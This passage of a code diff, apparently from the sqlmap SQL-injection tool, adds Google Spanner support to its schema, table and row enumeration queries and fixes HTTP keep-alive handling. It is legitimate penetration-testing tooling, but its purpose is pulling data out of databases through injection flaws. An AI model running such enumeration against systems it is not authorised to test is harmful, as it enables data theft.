errMsg = "on Spanner it is not possible to execute commands"
|
||||
raise SqlmapUnsupportedFeatureException(errMsg)
|
||||
|
||||
def osShell(self):
|
||||
errMsg = "on Spanner it is not possible to execute commands"
|
||||
raise SqlmapUnsupportedFeatureException(errMsg)
|
||||
|
||||
def osPwn(self):
|
||||
errMsg = "on Spanner it is not possible to establish an "
|
||||
errMsg += "out-of-band connection"
|
||||
raise SqlmapUnsupportedFeatureException(errMsg)
|
||||
|
||||
def osSmb(self):
|
||||
errMsg = "on Spanner it is not possible to establish an "
|
||||
errMsg += "out-of-band connection"
|
||||
raise SqlmapUnsupportedFeatureException(errMsg)
|
||||
|
|
@ -108,7 +108,7 @@ class Databases(object):
|
|||
warnMsg += "names will be fetched from 'mysql' database"
|
||||
logger.warning(warnMsg)
|
||||
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.PGSQL, DBMS.MONETDB, DBMS.DERBY, DBMS.VERTICA, DBMS.PRESTO, DBMS.MIMERSQL, DBMS.CRATEDB, DBMS.CACHE, DBMS.FRONTBASE, DBMS.SNOWFLAKE):
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.PGSQL, DBMS.MONETDB, DBMS.DERBY, DBMS.VERTICA, DBMS.PRESTO, DBMS.MIMERSQL, DBMS.CRATEDB, DBMS.CACHE, DBMS.FRONTBASE, DBMS.SNOWFLAKE, DBMS.SPANNER):
|
||||
warnMsg = "schema names are going to be used on %s " % Backend.getIdentifiedDbms()
|
||||
warnMsg += "for enumeration as the counterpart to database "
|
||||
warnMsg += "names on other DBMSes"
|
||||
|
|
@ -311,6 +311,9 @@ class Databases(object):
|
|||
if len(dbs) < 2 and ("%s," % condition) in query:
|
||||
query = query.replace("%s," % condition, "", 1)
|
||||
|
||||
if Backend.isDbms(DBMS.SPANNER):
|
||||
query = query.replace("IN ('default')", "IN ('')")
|
||||
|
||||
if query:
|
||||
values = inject.getValue(query, blind=False, time=False)
|
||||
|
||||
|
|
@ -371,7 +374,9 @@ class Databases(object):
|
|||
infoMsg += "database '%s'" % unsafeSQLIdentificatorNaming(db)
|
||||
logger.info(infoMsg)
|
||||
|
||||
if Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.FIREBIRD, DBMS.MAXDB, DBMS.ACCESS, DBMS.MCKOI, DBMS.EXTREMEDB):
|
||||
if Backend.getIdentifiedDbms() in (DBMS.SPANNER,):
|
||||
query = _count % (unsafeSQLIdentificatorNaming(db), unsafeSQLIdentificatorNaming(db))
|
||||
elif Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.FIREBIRD, DBMS.MAXDB, DBMS.ACCESS, DBMS.MCKOI, DBMS.EXTREMEDB):
|
||||
query = _count % unsafeSQLIdentificatorNaming(db)
|
||||
else:
|
||||
query = _count
|
||||
|
|
@ -404,6 +409,8 @@ class Databases(object):
|
|||
query = _query % index
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.HSQLDB, DBMS.INFORMIX, DBMS.FRONTBASE, DBMS.VIRTUOSO):
|
||||
query = _query % (index, unsafeSQLIdentificatorNaming(db))
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.SPANNER,):
|
||||
query = _query % (unsafeSQLIdentificatorNaming(db), unsafeSQLIdentificatorNaming(db), index)
|
||||
else:
|
||||
query = _query % (unsafeSQLIdentificatorNaming(db), index)
|
||||
|
||||
|
|
@ -628,6 +635,10 @@ class Databases(object):
|
|||
if Backend.isDbms(DBMS.MYSQL) and Backend.isFork(FORK.DRIZZLE):
|
||||
query = re.sub("column_type", "data_type", query, flags=re.I)
|
||||
|
||||
elif Backend.isDbms(DBMS.SPANNER):
|
||||
query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db), unsafeSQLIdentificatorNaming(conf.db))
|
||||
query += condQuery
|
||||
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE, DBMS.MIMERSQL, DBMS.SNOWFLAKE):
|
||||
query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(conf.db.upper()))
|
||||
query += condQuery
|
||||
|
|
@ -773,6 +784,10 @@ class Databases(object):
|
|||
query = rootQuery.blind.count % unsafeSQLIdentificatorNaming(tbl)
|
||||
query += condQuery
|
||||
|
||||
elif Backend.isDbms(DBMS.SPANNER):
|
||||
query = rootQuery.blind.count % (unsafeSQLIdentificatorNaming(tbl), conf.db, conf.db)
|
||||
query += condQuery
|
||||
|
||||
elif Backend.isDbms(DBMS.INFORMIX):
|
||||
query = rootQuery.blind.count % (conf.db, conf.db, conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl))
|
||||
query += condQuery
|
||||
|
|
@ -841,6 +856,9 @@ class Databases(object):
|
|||
elif Backend.isDbms(DBMS.SNOWFLAKE):
|
||||
query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(conf.db.upper()))
|
||||
field = None
|
||||
elif Backend.isDbms(DBMS.SPANNER):
|
||||
query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db), unsafeSQLIdentificatorNaming(conf.db))
|
||||
field = None
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.MONETDB, DBMS.CLICKHOUSE):
|
||||
query = safeStringFormat(rootQuery.blind.query, (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db), index))
|
||||
field = None
|
||||
|
|
@ -895,6 +913,8 @@ class Databases(object):
|
|||
query = rootQuery.blind.query2 % (conf.db, conf.db, conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl), column)
|
||||
elif Backend.isDbms(DBMS.MONETDB):
|
||||
query = rootQuery.blind.query2 % (column, unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db))
|
||||
elif Backend.isDbms(DBMS.SPANNER):
|
||||
query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl), column, unsafeSQLIdentificatorNaming(conf.db), unsafeSQLIdentificatorNaming(conf.db))
|
||||
|
||||
colType = unArrayizeValue(inject.getValue(query, union=False, error=False))
|
||||
key = int(colType) if hasattr(colType, "isdigit") and colType.isdigit() else colType
|
||||
|
|
|
|||
|
|
@ -241,7 +241,7 @@ class Entries(object):
|
|||
entries = BigArray(_zip(*[entries[colName] for colName in colList]))
|
||||
else:
|
||||
query = rootQuery.inband.query % (colString, conf.db, tbl)
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.VIRTUOSO, DBMS.CLICKHOUSE):
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.VIRTUOSO, DBMS.CLICKHOUSE, DBMS.SPANNER):
|
||||
query = rootQuery.inband.query % (colString, conf.db, tbl, prioritySortColumns(colList)[0])
|
||||
else:
|
||||
query = rootQuery.inband.query % (colString, conf.db, tbl)
|
||||
|
|
@ -410,7 +410,7 @@ class Entries(object):
|
|||
if column not in entries:
|
||||
entries[column] = BigArray()
|
||||
|
||||
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.CLICKHOUSE, DBMS.SNOWFLAKE):
|
||||
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.CLICKHOUSE, DBMS.SNOWFLAKE, DBMS.SPANNER):
|
||||
query = rootQuery.blind.query % (agent.preprocessField(tbl, column), conf.db, conf.tbl, sorted(colList, key=len)[0], index)
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE,):
|
||||
query = rootQuery.blind.query % (agent.preprocessField(tbl, column), tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())), index)
|
||||
|
|
|
|||
|
|
@ -153,7 +153,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry):
|
|||
if os.path.exists(filename):
|
||||
try:
|
||||
with openFile(filename, "wb") as f:
|
||||
f.write("1")
|
||||
f.write(b"1")
|
||||
except IOError as ex:
|
||||
errMsg = "there has been a file opening/writing error "
|
||||
errMsg += "for filename '%s' ('%s')" % (filename, getSafeExString(ex))
|
||||
|
|
|
|||
|
|
@ -198,6 +198,10 @@ safeFreq = 0
|
|||
# Valid: True or False
|
||||
skipUrlEncode = False
|
||||
|
||||
# Skip safe (HTML) encoding of payload data for SOAP/XML.
|
||||
# Valid: True or False
|
||||
skipXmlEncode = False
|
||||
|
||||
# Parameter used to hold anti-CSRF token.
|
||||
csrfToken =
|
||||
|
||||
|
|
|
|||
30
thirdparty/keepalive/keepalive.py
vendored
30
thirdparty/keepalive/keepalive.py
vendored
|
|
@ -164,8 +164,10 @@ class ConnectionManager:
|
|||
|
||||
def set_ready(self, connection, ready):
|
||||
self._lock.acquire()
|
||||
if connection in self._readymap: self._readymap[connection] = ready
|
||||
self._lock.release()
|
||||
try:
|
||||
if connection in self._readymap: self._readymap[connection] = ready
|
||||
finally:
|
||||
self._lock.release()
|
||||
|
||||
def get_ready_conn(self, host):
|
||||
conn = None
|
||||
|
|
@ -258,6 +260,16 @@ class KeepAliveHandler:
|
|||
|
||||
if DEBUG: DEBUG.info("STATUS: %s, %s", r.status, r.reason)
|
||||
|
||||
if not r.will_close:
|
||||
try:
|
||||
headers = getattr(r, 'msg', None)
|
||||
if headers:
|
||||
c_head = headers.get("connection")
|
||||
if c_head and "close" in c_head.lower():
|
||||
r.will_close = True
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# if not a persistent connection, don't try to reuse it
|
||||
if r.will_close:
|
||||
if DEBUG: DEBUG.info('server will close connection, discarding')
|
||||
|
|
@ -322,16 +334,16 @@ class KeepAliveHandler:
|
|||
|
||||
def _start_transaction(self, h, req):
|
||||
try:
|
||||
if req.data is not None:
|
||||
if req.data:
|
||||
data = req.data
|
||||
if hasattr(req, 'selector'):
|
||||
h.putrequest(req.get_method() or 'POST', req.selector, skip_host=req.has_header("Host"), skip_accept_encoding=req.has_header("Accept-encoding"))
|
||||
else:
|
||||
h.putrequest(req.get_method() or 'POST', req.get_selector(), skip_host=req.has_header("Host"), skip_accept_encoding=req.has_header("Accept-encoding"))
|
||||
if not req.has_header('Content-type'):
|
||||
if 'Content-type' not in req.headers:
|
||||
h.putheader('Content-type',
|
||||
'application/x-www-form-urlencoded')
|
||||
if not req.has_header('Content-length'):
|
||||
if 'Content-length' not in req.headers:
|
||||
h.putheader('Content-length', '%d' % len(data))
|
||||
else:
|
||||
if hasattr(req, 'selector'):
|
||||
|
|
@ -341,17 +353,17 @@ class KeepAliveHandler:
|
|||
except (socket.error, _http_client.HTTPException) as err:
|
||||
raise _urllib.error.URLError(err)
|
||||
|
||||
if not req.has_header('Connection'):
|
||||
if 'Connection' not in req.headers:
|
||||
h.putheader('Connection', 'keep-alive')
|
||||
|
||||
for args in self.parent.addheaders:
|
||||
if not req.has_header(args[0]):
|
||||
if args[0] not in req.headers:
|
||||
h.putheader(*args)
|
||||
for k, v in req.headers.items():
|
||||
h.putheader(k, v)
|
||||
h.endheaders()
|
||||
if req.data is not None:
|
||||
h.send(data)
|
||||
if req.data:
|
||||
h.send(req.data)
|
||||
|
||||
def _get_connection(self, host):
|
||||
raise NotImplementedError()
|
||||
|
|
|
|||
Loading…
Add table
Add a link
Reference in a new issue